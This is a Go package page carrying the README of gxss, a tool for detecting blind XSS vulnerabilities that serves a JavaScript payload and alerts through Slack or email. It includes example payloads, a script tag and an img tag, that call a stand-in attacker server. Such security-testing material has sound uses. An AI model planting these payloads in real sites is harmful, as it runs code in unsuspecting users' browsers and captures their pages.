gxss

command module
v0.0.1 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Aug 2, 2019 License: MIT Imports: 15 Imported by: 0

README

Blind XSS as a service

gxss is a simple tool which serves a javascript payload and allows to identify blind XSS vulnerabilities. This is similar to xsshunter, but a bit simpler to configure and run. Alerts can be sent via Slack or email. Emails will also have a screenshot of the DOM attached (which is not possible over the Slack webhook API).

gxss

Note: The javascript payload was taken (and slightly modified) from xsshunter

Installation

go get -u github.com/rverton/gxss

Configuration

Create a file called .env or set up your environment to export the following data:

PORT=8080
MAIL_SERVER=mail.example.com:25
MAIL_USER=user
MAIL_PASS=pass
MAIL_TO=hello@robinverton.de
MAIL_FROM=gxss@robinverton.de
SLACK_WEBHOOK=https://hooks.slack.com/XYZ
SERVE_URL=localhost:8080

The SERVE_URL is the public accessible URL of your server.

You can leave the MAIL_* or the SLACK_WEBHOOK setting blank if you do not want to use it. Find more about how to setup Slack webhooks here.

Usage

$ gxss

You can now use a payload like the following which will load and execute the javascript payload:

<script src=//yourserver.com></script>

gxss can also be used as a request bin. Every request matching //yourserver.com/k{key} will be alerted to you. Example:

<img src=//yourserver.com/kTARGET1>

Alternatives

  • xsshunter, python, most features, alerts require Mailgun account and wildcard certificate
  • xless, node.js, serverless on zeit.co, alerts over Slack

Documentation

The Go Gopher

There is no documentation for this package.

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.